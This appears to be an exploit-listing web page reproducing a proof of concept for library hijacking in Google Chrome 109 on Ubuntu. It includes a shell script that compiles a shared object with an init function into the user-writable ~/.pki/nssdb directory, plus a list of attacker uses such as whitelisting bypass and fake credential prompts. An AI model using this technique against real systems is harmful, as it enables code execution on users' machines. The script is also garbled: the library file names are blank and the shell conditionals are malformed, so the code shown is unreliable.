Google chrome109.0.5414.74 code execution via missing lib file (ubuntu) Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2023-04-08 | Type : local | Platform : linux
This exploit / vulnerability Google chrome109.0.5414.74 code execution via missing lib file (ubuntu) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Tested-on : Ubuntu 22.04.1


Google chrome attempts to load the '' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/
Since the Shared Library '' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `` in the specified path.


Following is the POC that could be used to reproduce the issue:

echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]

echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
echo "[+] Directory is writable..."

echo "[+] Directory is writable..."
echo "[+] Generating malicious File ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/ -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o



Upon closing the browser windows, the application executes the malicious code


The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.